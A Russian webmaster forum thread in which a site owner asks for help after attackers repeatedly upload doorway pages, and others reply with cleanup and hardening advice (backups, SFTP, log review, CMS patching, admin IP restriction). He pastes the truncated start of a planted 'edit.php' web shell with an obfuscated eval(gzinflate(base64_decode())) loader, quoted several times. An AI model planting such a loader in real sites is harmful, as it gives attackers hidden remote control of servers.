- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте!
К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..
Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:
<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl
В общем ЖОПА!!! Помогите, кто может... Достала эта хрень:dont:
вычисти код, закрой на время доступ на ftp, попробуй sftp
Здравствуйте!
К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..
Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:
<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl
В общем ЖОПА!!! Помогите, кто может... Достала эта хрень🙅
проверьте свой комп на вирусы.
Здравствуйте!
К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..
Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:
<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl
В общем ЖОПА!!! Помогите, кто может... Достала эта хрень🙅
Какой CMS пользуешься?
(http://www.backup-utility.com)
Здравствуйте!
К моему ФТП получил доступ хакер. Я почистил комп, не пользуюсь тоталкоммандером, нигде пароли не сохраняю. Менял много раз пароль на ФТП... Но человек за меня серьезно взялся..
Он заливает мне дорвеи HTML страницами. Достало удалять(( Создает в корне сайта такие файлы под названием edit.php:
<?php
$auth_pass = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b1pdxrHEjD82fec+x9aE24GYoQA2bkOEli2LNlybMnR4lV+yAADTDQwZGYQkh3996eqepnuWRCyk/uc97xyIkF3dXX1Xl1dizcsr7mTWXxdLnVP9o7f7h1/sl
В общем ЖОПА!!! Помогите, кто может... Достала эта хрень🙅
Проверяете свой комп на вирусы , далее пишите хостеру чтобы восстановил все файлы из бэкапа за ту дату когда всего этого ещё не было . А далее ищете дыры в движке ! ;)
Использую WordPress 3.0 и DLE 8.5 лицензия. И те и другие хакнули.
Комп проверил на все, что можно. Почистил реестр, переустановил браузеры. Теперь юзаю sftp. Сменил еще раз пароль.
gaishnik123 добавил 15.07.2010 в 13:05
Проверяете свой комп на вирусы , далее пишите хостеру чтобы восстановил все файлы из бэкапа за ту дату когда всего этого ещё не было . А далее ищете дыры в движке ! ;)
да я сам беру файлы из бэкапа)) благо, хостинг TimeWeb🚬 просто был в отъезде 2 недели, а бэкапы только за 4 дня. дыры в движке... сейчас курю форумы поддержки дле и ворда.
Хост тоже может быть дырявый. Это нужно знать, особенно когда самопальные и левые хостинги.
Бэкапы с таких нужно качать себе или на другой хост тоже.
Причем хостинг всегда все будет отрицать.
Посмотрите логи. Откуда и кто к вам залазил.
И когда нароете на форумах про wp 3.0 - пож. черканите. А то тоже обновился недавно до него.
С DLE были похожие пробелы, решил их вот так ТЫЦ и ТЫЦ
а фтп скорее всего не ломали просто есть ДЫРЫ в движках через них и лазят
Хорошо, админку защищу. Но вот скажите, разве реально через дыру в двиге залить на этот сайт и другие дорвей?! Т.е. у меня там сотня .хтмл страниц порнухи! На каждом сайте. Я думаю, что это только через ФТП...
Хорошо, админку защищу. Но вот скажите, разве реально через дыру в двиге залить на этот сайт и другие дорвей?! Т.е. у меня там сотня .хтмл страниц порнухи! На каждом сайте. Я думаю, что это только через ФТП...
Залили через дыру один раз скрипт, а он уже всё удалённо закачивает ! ;)
Залили через дыру один раз скрипт, а он уже всё удалённо закачивает ! ;)
да, скорее всего так и было дело. нашли дыру в 1 ДЛЕ сайте. потом лили доры на все сайты.
итак, я переустановил DLE, поставил защиту админки по IP. еще удалил все текстовые файлы а-ля Readme, чтобы хакер не узнал никакой информации о движке и о модулях, которые там стоят. запоролил некоторые папки с помощью хоста.
итог: пока затишье... файлов новых не появляется. если, что еще нарою - отпишу.